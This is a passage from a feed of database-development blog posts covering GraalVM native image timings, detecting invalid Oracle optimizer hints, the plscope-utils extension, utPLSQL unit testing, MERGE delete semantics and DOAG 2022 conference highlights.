  44.91s user 1.82s system 305% cpu 15.317 total
  45.12s user 1.69s system 305% cpu 15.304 total
  45.85s user 1.61s system 309% cpu 15.344 total
2) GraalVM (java -jar ./tvdformat.jar)
  77.32s user 4.22s system 365% cpu 22.297 total
  77.59s user 4.32s system 371% cpu 22.044 total
  82.49s user 4.77s system 372% cpu 23.451 total
3) ARM JDK (java -jar ./tvdformat.jar)
  17.47s user 0.62s system 244% cpu 7.385 total
  17.02s user 0.57s system 242% cpu 7.262 total
  17.84s user 0.66s system 246% cpu 7.495 total

I used the result of the second execution per variant to create the chart.

Scenario 2 - Formatting 56 Files - Native Image vs Executable JAR

The native image is about 30% faster and uses about 40% less CPU resources. Rosetta 2 leads to an overhead of about factor 4.7 from a CPU usage perspective.

Conclusion

Wow, just wow, when I look at the performance and resource consumption figures of a native image. Startup times are really amazing and I was surprised by the results when formatting 56 files. The native image only consumes about half of the CPU resources compared to the executable JAR variant. This means lower operating costs while improving the enduser experience.

The price for a native image is higher development costs and the risk of runtime errors that would not occur in traditional Java environments. You definitely need to adjust your testing strategies to mitigate that risk. This is mandatory, not an option.

In this blog post I eliminated all known runtime errors after four builds. In reality it took much longer. I spent a lot of time hunting down the reasons for different behaviours between the executable JAR and the native image. This might improve once the debugger becomes available for the community edition. But even then you have to build a new image after a change. Only then you can start debugging. This results in long feedback loops. It does not matter whether you instrument your code or use a debugger.

This technology is fairly new. I’m sure that the tooling will improve over time. In the meantime, I’d prefer to use native images only for simple artifacts.

The post GraalVM Native Image – First Impressions appeared first on Philipp Salvisberg's Blog.

Finding Wrong Hints

$
0
0

Introduction

I use the Oracle Database since many years. And I use hints. For experiments, but also in production code. There are cases when you know more than the Oracle Database. For example about the cardinality of a data source or the number of result rows to process or the number of expected executions of a statement. Hints are a way to provide additional information, limit the solution space and enable the database to do a better job. That’s a good thing.

Hints Are Instructions

Hints are passed as special comments at a certain position in SQL statements. They are comments, but they are also instructions. They have to be followed. However, there are cases when hints are not applicable. For example when you request the optimizer to use an index when there is no index defined for the underlying table. In such a case the Oracle Database has basically two options. Either throw an error or ignore the invalid instruction and find another solution. The Oracle Database does the latter.

Hint Report

Starting with version 19c you can produce a hint report that reveals unused hints. Here’s an example:

create table t (c1 integer, c2 varchar2(20));
insert into t values (1, 'one');
insert into t values (2, 'two');
select /*+ index(t) */ * from t where c1 > 0;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
select /*+ index(t) */ * from t where c1 > 0
 
Plan hash value: 1601196873
 
------------------------------------------
| Id  | Operation                 | Name |
------------------------------------------
|   0 | SELECT STATEMENT          |      |
|   1 |  TABLE ACCESS STORAGE FULL| T    |
------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 1 (U - Unused (1))
---------------------------------------------------------------------------
 
   1 -  SEL$1 / "T"@"SEL$1"
         U -  index(t)

The hint index(t) defined on line 4 is valid, but it’s reported as unused on line 25. No wonder. There is no index defined on table t.

Let’s create an index and rerun the query.

create unique index t_c1_i on t(c1);
select /*+ index(t) */ * from t where c1 > 0;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
select /*+ index(t) */ * from t where c1 > 0
 
Plan hash value: 2704710798
 
------------------------------------------------------
| Id  | Operation                           | Name   |
------------------------------------------------------
|   0 | SELECT STATEMENT                    |        |
|   1 |  TABLE ACCESS BY INDEX ROWID BATCHED| T      |
|   2 |   INDEX RANGE SCAN                  | T_C1_I |
------------------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 1
---------------------------------------------------------------------------
 
   1 -  SEL$1 / "T"@"SEL$1"
           -  index(t)

Now the hint index(t) defined on line 2 is reported as used on line 24.

Mixing Hints and Comments

What happens if we mix hints and comments? It depends where you place the comment. Let’s look at the next example.

select /*+ index(t) forcing unnecessary index access */ * from t where c1 > 0;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
select /*+ index(t) forcing unnecessary index access */ * from t where 
c1 > 0
 
Plan hash value: 2704710798
 
------------------------------------------------------
| Id  | Operation                           | Name   |
------------------------------------------------------
|   0 | SELECT STATEMENT                    |        |
|   1 |  TABLE ACCESS BY INDEX ROWID BATCHED| T      |
|   2 |   INDEX RANGE SCAN                  | T_C1_I |
------------------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 4 (E - Syntax error (3))
---------------------------------------------------------------------------
 
   1 -  SEL$1
         E -  forcing
         E -  index 
         E -  unnecessary
 
   1 -  SEL$1 / "T"@"SEL$1"
           -  index(t)

The comment forcing unnecessary index access on line 1 is interpreted as a series of hints and reported as errors on line 24 to 26. The token access was not reported. However, the hint index(t) was reported as used on line 29.

What happens if we move the comment to the beginning?

select /*+ forcing unnecessary index access index(t) */ * from t where c1 > 0;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
select /*+ forcing unnecessary index access index(t) */ * from t where 
c1 > 0
 
Plan hash value: 2704710798
 
------------------------------------------------------
| Id  | Operation                           | Name   |
------------------------------------------------------
|   0 | SELECT STATEMENT                    |        |
|   1 |  TABLE ACCESS BY INDEX ROWID BATCHED| T      |
|   2 |   INDEX RANGE SCAN                  | T_C1_I |
------------------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 3 (E - Syntax error (3))
---------------------------------------------------------------------------
 
   1 -  SEL$1
         E -  forcing
         E -  index 
         E -  unnecessary

The same invalid hints are reported as before on line 24 to 26. However, the hint index(t) was used but not reported as such. This seems to be a limitation of the current hint report in the Oracle Database 21c.

Anyways, it clearly shows that you should not mix comments and hints. Instead you should write it like this:

select /* forcing unnecessary index access */ /*+ index(t) */ * from t where c1 > 0;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
select /* forcing unnecessary index access */ /*+ index(t) */ * from t 
where c1 > 0
 
Plan hash value: 2704710798
 
------------------------------------------------------
| Id  | Operation                           | Name   |
------------------------------------------------------
|   0 | SELECT STATEMENT                    |        |
|   1 |  TABLE ACCESS BY INDEX ROWID BATCHED| T      |
|   2 |   INDEX RANGE SCAN                  | T_C1_I |
------------------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 1
---------------------------------------------------------------------------
 
   1 -  SEL$1 / "T"@"SEL$1"
           -  index(t)

Now the hint index(t) is reported as used. All good, right?

The Problem

I like statically-type languages. Mainly because errors are reported at compile time whenever possible. However, to check hints I need to produce an explain plan. This is possible for a single statement only. This is cumbersome especially when you write code in PL/SQL. As far as I know, there is no option to produce a compile error for invalid hints.

I recently reviewed a system and found a lot of invalid hints. Here are some real-life hints copied from a production code base:

  • /*+ parallel 4 */
  • /*+ no_xml_query_rewrite +materialize */
  • /*+ materialized */
  • /*+ first rows cardinality (a,10) */
  • /*+ append nologging */
  • /*+ le ading(g) u se_nl(g) u se_hash(p, b) */

The last example is a kind of commented out hint series. In this case it’s clearly commented out code. But if you see just a single hint like /*+ le ading(g) */ in the code, you do not know if the space after le was entered intentionally or by accident.

So, how can we identify invalid hints in our code?

Step 1 – Distinguish Between Comments and Hints

We can configure Oracle’s SQL Developer to show hints in a different color than comments. Here’s the screenshot of an example I showed above:

Distinguish between comments and hints

Go to this GitHub repository and follow the instructions to configure your SQL Developer installation accordingly. See also this blog post for more information about the Arbori code that makes such code highlighting possible.

This step make hints stand out in your code. However, it does not reveal invalid hints.

Step 2 – Install db* CODECOP for SQL Developer

To reveal invalid hints we need a linter. A tool that does some static code analysis. db* CODECOP is such a tool suite. The SQL Developer extension is available for free. It checks the editor content for violations of the Trivadis PL/SQL & SQL Coding Guidelines. Furthermore, db* CODECOP allows you to implement custom guideline checks. The example GitHub repository provides the following four guideline checks regarding hints:

  • G-9600: Never define more than one comment with hints.
  • G-9601: Never use unknown hints.
  • G-9602: Always use the alias name instead of the table name.
  • G-9603: Never reference an unknown table/alias.

To install db* CODECOP and these additional custom guideline checks follow the instructions in this GitHub repository.

Finding Wrong Hints With db* CODECOP

I asked my followers on Twitter if this hint is valid:

Twitter Poll

The result is not really representative. However, 25% thought that /*+ +materialize */ is a valid hint.

Checking the code with db* CODECOP reveals that the hint is invalid and the majority of the poll participants were right.

Invalid hint

Verify Result

But is the result of db* CODECOP correct? The following explain plan shows that the hint /*+ +materialize */ is not reported at all. It’s treated as a comment. Another example where the hint report is incomplete.

with e as (
   select /*+ +materialize */ *
     from emp
    where deptno = 10
)
select *
  from e;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
with e as (    select /*+ +materialize */ *      from emp     where 
deptno = 10 ) select *   from e
 
Plan hash value: 3956160932
 
------------------------------------------
| Id  | Operation                 | Name |
------------------------------------------
|   0 | SELECT STATEMENT          |      |
|   1 |  TABLE ACCESS STORAGE FULL| EMP  |
------------------------------------------

Let’s run the same query after removing the extra + in the hint:

with e as (
   select /*+ materialize */ *
     from emp
    where deptno = 10
)
select *
  from e;
select * from dbms_xplan.display_cursor(format => 'basic +hint_report');

EXPLAINED SQL STATEMENT:
------------------------
with e as (    select /*+ materialize */ *      from emp     where 
deptno = 10 ) select *   from e
 
Plan hash value: 3494145522
 
--------------------------------------------------------------------------------
| Id  | Operation                                | Name                        |
--------------------------------------------------------------------------------
|   0 | SELECT STATEMENT                         |                             |
|   1 |  TEMP TABLE TRANSFORMATION               |                             |
|   2 |   LOAD AS SELECT (CURSOR DURATION MEMORY)| SYS_TEMP_DFD9DB186_8AAEBD74 |
|   3 |    TABLE ACCESS STORAGE FULL             | EMP                         |
|   4 |   VIEW                                   |                             |
|   5 |    TABLE ACCESS STORAGE FULL             | SYS_TEMP_DFD9DB186_8AAEBD74 |
--------------------------------------------------------------------------------
 
Hint Report (identified by operation id / Query Block Name / Object Alias):
Total hints for statement: 1
---------------------------------------------------------------------------
 
   2 -  SEL$1
           -  materialize

Now, the materialize hint has an effect on the execution plan and the hint is reported as used on line 33.

Conclusion

I believe that hints are required for certain use cases. You may have a different opinion. However, if you are using hints in your code you should ensure that they are valid. db* CODECOP can help you to do that. The SQL Developer extension is free. Just use it.

 

 

The post Finding Wrong Hints appeared first on Philipp Salvisberg's Blog.

plscope-utils for SQL Developer 1.0 – What’s New?

$
0
0

Introduction

PL/Scope is an SDK for source code analysis. It is available since Oracle Database 11g Release 1 and has been significantly improved in 12c Release 2.

plscope-utils for SQL Developer is a SQL Developer extension that simplifies the compilation with PL/Scope, visualizes PL/Scope information under a PL/Scope node in the Connections window and provides various source code analysis reports.

Follow these instructions for a fresh install or an update to the latest version of plscope-utils for SQL Developer.

Updated Tree Structure

The level for grouping primary and secondary object types was removed. This makes the the tree simpler. All object types can now be filtered. This is especially helpful for schemas with many objects. And there is an additional node for Sequences.

PL/Scope node in SQL Developer's Connection window (plscope-utils)

No more ORA-01436: CONNECT BY loop in user data

Many queries are based on recursive structures. In some data constellations, an ORA-1436 error caused no result to be returned. The reasons for this were manifold. Due to wrongly fixed hierarchies or due to dependency loops in the Oracle data dictionary. However, incomplete hierarchies are now fixed without causing a loop and all hierarchical queries use the cycle_clause which detects loops, avoids such runtime errors and ensures a reasonable result even with loops in the underlying data.

Concise Representation of Identifiers

Romain Vassallo contributed a pull request for the plscope_identifiers view. He added a column name_usage to combine name, type, usage and sql_id in a single column with a left indent of two characters per level.

The Identifiers tab includes now a column Name (Type, Usage) with this nifty logic.

PL/Scope identifiers tab in SQL Developer (plscope-utils)

That’s all?

Yes, regarding plscope-utils for SQL Developer. However, there are optional PL/SQL packages and views for static code analysis based on PL/Scope. Optional means, the SQL Developer extension does not need them. But if you have to analyze code in your Oracle database they can be a good starting point for your work.

Related Information

If you are interested in PL/Scope, the following links may be of interest:

The post plscope-utils for SQL Developer 1.0 – What’s New? appeared first on Philipp Salvisberg's Blog.

Testing With utPLSQL – Made Easy With SQL Developer

$
0
0

Nowadays, everything is about automation. Software testing is no exception. After an introduction, we will create and run utPLSQL tests with Oracle SQL Developer for a fictitious user story. Our tests will cover a PL/SQL package, a virtual column, two database triggers and a view. The full code samples can be found here.

This blog post is based on my German article Testen mit utPLSQL – Leicht gemacht mit SQL Developer, published in issue 4/2022 of the Red Stack Magazin.

What is Test Automation?

Here’s the definition from the English Wikipedia page:

Test automation is the use of software separate from the software being tested to control the execution of tests and the comparison of actual outcomes with predicted outcomes.

If the actual results match the expected results, then the tests are successful. An important aspect of test automation is the prior definition of expected results. Expected results are simply requirements. In other words, we use automated tests to check whether the requirements for a software are met.

Why Do We Need Automated Tests?

The use of agile methods and the associated shorter release cycles mean that we need to test software more frequently. In a CI/CD environment, automated tests can be executed directly after a commit in a version control system. Through this continuous testing, the state of the software quality is constantly available. In case of deviations, the possible causes can be identified more quickly due to the shorter intervals between tests. In addition, the changes, since the last successful test run, are still present in the minds of the developers. All this simplifies troubleshooting.

When software is tested only semi-automatically or manually, this leads to higher costs, higher risks, delivery delays or quality problems. It is simply not efficient to perform automatable tasks manually.

Repeating automated tests is cheap. Unlike manual tests, there is no reason to compromise. This is especially important for central components of a software solution. We need to ensure that changes do not have any unwanted effects on other parts of the software solution.

Do Automated Tests Have Downsides?

In the end, an automated test is also software that needs to be maintained. Tests that are not reliable are especially problematic. These are so-called “flaky” tests, which sometimes fail, but if you repeat them often enough, deliver the expected result. Such tests quickly do more harm than good. The more flaky tests there are, the higher the probability that the CI job will fail, resulting in manual activities.

What Can We Test in the Database?

Basically, every component of an application installed in the database can be tested automatically. These are, for example, object types, packages, procedures, functions, triggers, views and constraints.

We do not write tests for ordinary not null check constraints since we do not want to test the basic functionality of a database. However, it might be useful to test a complex expression of a virtual column or a complex condition of a check constraint. A view is based on a select statement. select statements can be quite complex even without PL/SQL units in the with_clause. Consequently, we also have the need to check whether views return the expected results.

Object types, packages, procedures, functions and triggers mainly contain code in PL/SQL. However, PL/SQL allows embedding various other languages such as SQL, C, Java or JavaScript. It goes without saying that these components should be tested with automated tests. This also applies to database triggers, which cannot be executed directly. Of course, it simplifies testing if the logic of the database triggers is stored in PL/SQL packages and database triggers only contain simple calls to package procedures.

What Is utPLSQL?

utPLSQL is a testing suite for code in the Oracle database and is based on concepts from other unit testing frameworks such as JUnit and RSpec. The figure below shows the components of the utPLSQL suite.

utPLSQL

Core Testing Framework

The Core Testing Framework is installed in a dedicated schema of the Oracle database. All tables in this schema are used for temporary data or caching purposes. That means newer or older versions of utPLSQL can be installed at any time without data loss. Test suites are PL/SQL packages which are annotated with a special comment --%suite. These special comments are called annotations and provide utPLSQL with all information for test execution. utPLSQL uses different concepts to efficiently read the required data from the Oracle data dictionary views, so that tests can be executed without noticeable time delay even in schemas with more than 40 thousand PL/SQL packages.

Development

The utPLSQL plugins for SQL Developer from Oracle and PL/SQL Developer from Allround Automations support database developers in creating, executing and debugging tests. Code coverage reports provide information about which code is covered by tests. These two plugins are provided by the utPLSQL team. Quest and JetBrains position utPLSQL as the standard for testing code in an Oracle database and support utPLSQL directly in their products TOAD and DataGrip.

Test Automation

utPLSQL uses reporters to produce the results of a test run in any number of output formats. The command line client or the Maven plugin can be used for this purpose. A popular output format is the JUnit, since it is compatible with most tools in the CI/CD area. TeamCity and Team Foundation Server are supported with specific reporters. For code coverage utPLSQL provides reporters for SonarQube, Coveralls and Cobertura. Thanks to the flexible reporter concept, utPLSQL can be integrated into any CI/CD environment. For example, in Jenkins, Bamboo, Azure DevOps, Travis CI, GitLab, Github Actions and many more.

Case Study And Solution Approach

We use a schema redstack with the known Oracle tables dept and emp. In the current sprint, the following user story from our HR manager is scheduled:

As a HR manager, I need a table with the key figures salary total, number of employees and average salary per department to assess fairness.

I interpret the requirement literally and create a table according to listing 1.

create table deptsal (
    deptno   number(2, 0)  not null
       constraint deptsal_pk primary key,
    dname    varchar2(14)  not null,
    sum_sal  number(10, 2) not null,
    num_emps number(4, 0)  not null,
    avg_sal  number(7, 2)  
       generated always as (
          case
             when num_emps != 0 then
                round(sum_sal / num_emps, 2)
             else
                0
             end
       ) virtual
);

I populate the table using a PL/SQL package procedure called “etl.refresh_deptsal”. The exact implementation is not so important. If you are interested you can find it here.

Test Suite and Test Run

Writing the code before the test is not test-driven development. Anyway, I am a pragmatist and not a dogmatist. In the end, I feel the need to check if my code does what it should do. To execute the code, I use utPLSQL. The utPLSQL extension for SQL Developer helps me to do this. For example, I can generate the skeleton of a test suite based on my existing implementation or use the code templates to create a test package, a test package body or a test procedure. The following figure shows the utPLSQL preferences of the generator and the code templates in SQL Developer.

utPLSQL preferences

In a new worksheet, I entered ut_spec followed by Ctrl-Space to fill in the template for a test suite. Listing 2 shows the result.

create or replace package test_etl is
   --%suite

   --%test
   procedure refresh_deptsal;
end test_etl;
/

The annotation --%suite identifies the package test_etl as a test suite. The annotation for the package must follow the keyword is or as. Up to the first empty line all annotations are assigned to the package. The annotation --%test marks the procedure refresh_deptsal as a test. A test suite can consist of any number of tests. Tests can optionally be grouped with the annotations --%context(<name>) and  --%endcontext. utPLSQL supports more than 20 annotations, which are available as snippets in SQL Developer.

I can now run this test suite. Either via the context menu in the editor or on a node in the navigation tree. The following figure  shows the utPLSQL test runner after the execution of the test.

utPLSQL error

The test runner uses two additional temporary connections to the database in the background. This way the SQL Developer is never blocked, which is very helpful especially for more time consuming tests. It is even possible to run independent tests simultaneously.

Test Implementation and Test Run

The test refresh_deptsal produces an error. The reason is obvious. The implementation of the test is missing. So, let’s create the missing package body.

create or replace package body test_etl is
   procedure refresh_deptsal is
      c_actual   sys_refcursor;
      c_expected sys_refcursor;
   begin
      -- act
      etl.refresh_deptsal;
      
      -- assert;
      open c_actual for select * from deptsal;
      open c_expected for
         select d.deptno,
                d.dname,
                nvl(sum(e.sal), 0) as sum_sal,
                nvl(count(e.empno), 0) as num_emps,
                nvl(trunc(avg(e.sal), 2), 0) as avg_sal
           from dept d
           left join emp e
             on e.deptno = d.deptno
          group by d.deptno, d.dname;
      ut.expect(c_actual).to_equal(c_expected)
                         .join_by('DEPTNO');
   end refresh_deptsal;
end test_etl;
/

The implementation of the test in listing 3 uses the AAA pattern. It stands for Arrange-Act-Assert. In the arrange step, the test is prepared. Here, this step is missing since the test is based on existing data. In the act step, we execute the code under test. And in the assert step, we compare the actual result with the expected result. utPLSQL provides a variety of type-safe matchers for this purpose. In this case we compare two cursors. The data types as well as the contents of the columns are compared for all rows. The figure below shows the result after our next test run.

utPLSQL failure

Now the test run produces a failure. This means that the test does not deliver the expected result. In the Failures tab of the test runner, the details are displayed. We see that we expected 4 rows and also got 4 rows. However, there are differences in the column avg_sal for two records. This looks like a rounding difference. Obviously we round up in the code and round down in the test. What is correct now? I would say rounding up is common and that’s why we should adjust the test. After replacing trunc with round in the test implementation (see line 16 in listing 3), the test will complete successfully.

Test Cases for Insert, Update and Delete

The test refresh_deptsal expects data in the tables dept and emp If the tables are empty, the test still works. This is not wrong, but it shows that the quality of the test is strongly dependent on our existing data. Also, we run the risk that the test code for the assert will mirror the implementation and any errors will be repeated. Listing 4 shows an additional test based on our own test data.

create or replace package body test_etl is
   procedure refresh_deptsal is
      c_actual   sys_refcursor;
      c_expected sys_refcursor;
   begin
      -- act
      update emp
         set sal = sal
       where rownum = 1;

      -- assert;
      open c_actual for select * from deptsal;
      open c_expected for
         select d.deptno,
                d.dname,
                nvl(sum(e.sal), 0) as sum_sal,
                nvl(count(e.empno), 0) as num_emps,
                nvl(round(avg(e.sal), 2), 0) as avg_sal
           from dept d
           left join emp e
             on e.deptno = d.deptno
          group by d.deptno, d.dname;
      ut.expect(c_actual).to_equal(c_expected).join_by('DEPTNO');
   end refresh_deptsal;

   procedure refresh_deptsal_new_dept_without_emp is
      c_actual   sys_refcursor;
      c_expected sys_refcursor;
   begin
      -- act
      insert into dept (deptno, dname, loc)
      values (-10, 'utPLSQL', 'Winterthur');
      
      -- assert
      open c_actual for select * from deptsal where deptno = -10;
      open c_expected for
         select -10 as deptno,
                'utPLSQL' as dname,
                0 as sum_sal,
                0 as num_emps,
                0 as avg_sal
           from dual;
      ut.expect(c_actual).to_equal(c_expected).join_by('DEPTNO');
   end refresh_deptsal_new_dept_without_emp;

   procedure refresh_deptsal_new_dept_with_emp is
      c_actual   sys_refcursor;
      c_expected sys_refcursor;
   begin
      -- act
      insert into dept (deptno, dname, loc)
      values (-10, 'utPLSQL', 'Winterthur');
      insert into emp (empno, ename, job, hiredate, sal, deptno)
      values (-1, 'Jacek', 'Developer', trunc(sysdate), 4700, -10);
      insert into emp (empno, ename, job, hiredate, sal, deptno)
      values (-2, 'Sam', 'Developer', trunc(sysdate), 4300, -10);
      
      -- assert
      open c_actual for select * from deptsal where deptno = -10;
      open c_expected for
         select -10 as deptno,
                'utPLSQL' as dname,
                9000 as sum_sal,
                2 as num_emps,
                4500 as avg_sal
           from dual;
      ut.expect(c_actual).to_equal(c_expected).join_by('DEPTNO');
   end refresh_deptsal_new_dept_with_emp;

   procedure refresh_deptsal_upd_dept_and_emp is
      c_actual   sys_refcursor;
      c_expected sys_refcursor;
   begin
      -- arrange
      insert into dept (deptno, dname, loc)
      values (-10, 'utPLSQL', 'Winterthur');
      insert into emp (empno, ename, job, hiredate, sal, deptno)
      values (-1, 'Jacek', 'Developer', trunc(sysdate), 4700, -10);
      insert into emp (empno, ename, job, hiredate, sal, deptno)
      values (-2, 'Sam', 'Developer', trunc(sysdate), 4300, -10);
      
      -- act
      update dept set dname = 'Testing' where deptno = -10;
      update emp set sal = 5000 where empno = -2;
      
      -- assert
      open c_actual for select * from deptsal where deptno = -10;
      open c_expected for
         select -10 as deptno,
                'Testing' as dname,
                9700 as sum_sal,
                2 as num_emps,
                4850 as avg_sal
           from dual;
      ut.expect(c_actual).to_equal(c_expected).join_by('DEPTNO');
   end refresh_deptsal_upd_dept_and_emp;

   procedure refresh_deptsal_del_dept is
      c_actual sys_refcursor;
   begin
      -- arrange
      insert into dept (deptno, dname, loc)
      values (-10, 'utPLSQL', 'Winterthur');

      -- act
      delete from dept where deptno = -10;

      -- assert
      open c_actual for select * from deptsal where deptno = -10;
      ut.expect(c_actual).to_have_count(0);
   end refresh_deptsal_del_dept;
end test_etl;
/

First, a department -10 is created with employees -1 and -2. Then the salaries of these two employees are adjusted. The expected result are based entirely on literals. Real identifiers are often positive. The use of negative values make the tests independent of existing data. utPLSQL automatically sets a savepoint before running a test. At the end of the test a rollback to this savepoint is performed. However, if a commit occurs somewhere, the test data with negative identifiers are quickly found and deleted.

The next figure shows the successful execution of further tests, which I created here.

successful utPLSQL test run

Automatic Refresh

The table deptsal is updated by calling etl.refresh_deptsal. We can fire this call using database triggers. Listing 5 shows how.

create or replace trigger dept_as_iud
   after insert or update or delete on dept
begin
   etl.refresh_deptsal;
end;
/
create or replace trigger emp_as_iud
   after insert or update or delete on emp
begin
   etl.refresh_deptsal;
end;
/

Now the table deptsal  is updated after each DML statement on tables emp and dept. To test if the database triggers work, I just need to remove the call to etl.refresh_deptsal in the existing tests. For the test on the existing data, I can fire a refresh with a technical update. And voilà, all tests run through without errors.

Time to commit the changes in the version control system, create a pull request, and perform a review.

Incorporating Review Comments

I showed the code to my colleague Lisa. She said that the solution is more complex than necessary and inefficient. On the one hand, the deptsal table is updated too often, for example before a rollbackor when more than one DML statement is used on the underlying tables within a transaction. On the other hand, providing a table is not absolutely necessary. Even though the HR manager specifically mentions “table” in her story, it is legitimate to use a view here instead of a table. Lisa thinks that with the amount of data we have, the performance should be good enough, especially if the query is limited to a few departments. Also, these metrics are not queried that often. A view would significantly reduce our code base and simplify maintenance.

Of course Lisa is right. I can drop the table deptsal, the package etl and the database triggers. A simple view called deptsal, which is based on the fixed query in Listing 3, is sufficient here. But what do I do with my tests? – Nothing! They still describe the requirements, which have not changed, and therefore complete successfully. Unless I made a mistake when defining the view.

Refactoring is much easier with existing tests. Some people would argue that tests are what make safe refactoring possible.

Core Messages And Recommendations

The first steps with utPLSQL are the hardest. Make utPLSQL available in all your development and testing environments. For shared environments, ask your DBA for help. Install also the extension for SQL Developer, it is not a requirement, but it simplifies the work with utPLSQL considerably.

Start with small steps. Use utPLSQL to reproduce bugs or to test new requirements. After a short time you will experience how utPLSQL changes the way you code. You will write smaller units. You will isolate code that is difficult to test. This will make your code easier to test and easier to maintain.

The post Testing With utPLSQL – Made Easy With SQL Developer appeared first on Philipp Salvisberg's Blog.

Deleting Rows With Merge

$
0
0

The merge statement allows you to insert, update and delete rows in the target table in one go. This is great. However, the delete part does not work as expected. Is it a bug? No, it works exactly as documented. Nonetheless, I was not aware of this for years. Let’s take a look at this with an example.

Setup

We create a table t (target) with three rows and a table s (source) with 4 rows. To log DML events we create some after row triggers on table t.

create table t (
   id integer      not null primary key,
   c1 varchar2(20) not null
);

insert into t values (1, 'original 1');
insert into t values (2, 'original 2');
insert into t values (3, 'original 3');

create table s (
   id integer      not null,
   op varchar2(1)  not null check (op in ('I', 'U', 'D')),
   c1 varchar2(20) not null
);

insert into s values (1, 'U', 'original 1');
insert into s values (2, 'U', 'changed 2');
insert into s values (3, 'D', 'deleted 3');
insert into s values (4, 'I', 'new 4');

create or replace trigger t_ar_i after insert on t for each row
begin
   sys.dbms_output.put_line('inserted id ' || :new.id);
end;
/

create or replace trigger t_ar_u after update on t for each row
begin
   sys.dbms_output.put_line('updated id ' || :old.id);
end;
/

create or replace trigger t_ar_d after delete on t for each row
begin
   sys.dbms_output.put_line('deleted id ' || :old.id);
end;
/

Insert, Update, Delete via Merge

Now, we can run this script:

set serveroutput on size unlimited
merge into t
using s
   on (t.id = s.id)
 when matched then
      update
         set t.c1 = s.c1
      delete
       where op = 'D'
 when not matched then
      insert (t.id, t.c1)
      values (s.id, s.c1);
select * from t;      
rollback;

updated id 1
updated id 2
updated id 3
deleted id 3
inserted id 4

4 rows merged.

        ID C1                  
---------- --------------------
         1 original 1          
         2 changed 2           
         4 new 4               

Rollback complete.

The merge statement applied the insert, update and delete operation in the target table t. The result in table t is what we expect.

However, when I look at the output of the DML triggers I do not like the following things:

  • The row with id 1 was updated, even if the column c1 did not change. This update is unnecessary and should be avoided, right?
  • The row with id 3 was updated and then deleted. Updating a row and then deleting it? The first update does not seem necessary, right?

Update Filter

The merge_update_clause documents an optional where_clause for the update part of a merge statement.

Let’s try that to avoid the unnecessary updates.

set serveroutput on size unlimited
merge into t
using s
   on (t.id = s.id)
 when matched then
      update
         set t.c1 = s.c1
       where op = 'U'
         and t.c1 != s.c1
      delete
       where op = 'D'
 when not matched then
      insert (t.id, t.c1)
      values (s.id, s.c1);
select * from t;      
rollback;

updated id 2
inserted id 4

2 rows merged.

        ID C1                  
---------- --------------------
         1 original 1          
         2 changed 2           
         3 original 3          
         4 new 4               

Rollback complete.

Good, no more unnecessary updates. But now we have a new issue. The row with id 3 is not deleted. It looks like the delete part of the merge statement is ignored.

The Fine Print

I thought this was a bug and opened a service request some days ago. The friendly and patient support engineer directed me to this excerpt of the merge_update_clause in the SQL Language Reference of the Oracle Database 19c:

Specify the DELETE where_clause to clean up data in a table while populating or updating it. The only rows affected by this clause are those rows in the destination table that are updated by the merge operation.

So, clearly not a bug. The second sentence can be visualized as Venn diagram:

Venn diagram of deletes in a merge statement

First Update Then Delete

So we have learned that we must first update a row before we can delete it when we use a merge statement. However, we can still avoid unnecessary updates if the row does not need to be deleted.

Let’s update our script once more:

set serveroutput on size unlimited
merge into t
using s
   on (t.id = s.id)
 when matched then
      update
         set t.c1 = s.c1
       where t.c1 != s.c1
          or op = 'D'
      delete
       where op = 'D'
 when not matched then
      insert (t.id, t.c1)
      values (s.id, s.c1);
select * from t;
rollback;

updated id 2
updated id 3
deleted id 3
inserted id 4

3 rows merged.

        ID C1                  
---------- --------------------
         1 original 1          
         2 changed 2           
         4 new 4               

Rollback complete.

Looks good!

The update of the row with id 1 was suppressed, because the c1 column did not change. The row with id 2 was changed, a new row with id 4 was inserted and the row with id 3 is gone. We just have to live with the prior update of id 3.

Conclusion

I imagine I’m not the only one who would have expected the merge statement to behave differently. Especially after watching How to UPSERT (INSERT or UPDATE) rows with MERGE in Oracle Database by Chris Saxon. He also mentioned “delete” here and here.

Remember:

Delete only processes rows that were updated.
— Chris Saxon

 

The post Deleting Rows With Merge appeared first on Philipp Salvisberg's Blog.


DOAG2022 Highlights

$
0
0

Nobody knows what kind of restrictions we will experience later this year. That’s why the DOAG Conference + Exhibition 2022 took place in September instead of November. The organizers wanted an in-person event. While you can access some chosen content remotely an in-person event has a lot of advantages, like getting in touch with speakers and attendees. I enjoyed it very much. Many thanks to DOAG and all the people behind the scenes who made this possible.

In this blog post, I summarize some of my personal highlights in chronological order.

Day 1 – Theme Day

The very first day of the conference was a theme day. Themes were

  • PL/SQL & APEX
  • Oracle Forms
  • Automation
  • Ransomware
  • Database Migrations
  • Multitenant Architecture
  • PostgreSQL
  • Autonomous Database for DevOps
  • Softskills

Most of the themes were organized as mini conferences with sessions you could join. Others were more like workshops with lightning talks as introduction. And there was the opportunity to book some 1:1 time slots with developer experts for questions regarding Oracle database, performance, JSON, XML, blockchain, frontend testing, JavaScript, NodeJS, cloud, containers, microservices, mobile UI, PWA, low code, SSO, APEX good practices, APEX API, APEX plugins, REST, spatial and more.

AFAIK all sessions were in German on this day. Participants and speakers without the knowledge of German probably felt a bit lost and took the opportunity to talk over a drink or a meal.

PostgreSQL Features Oracle People Will Like

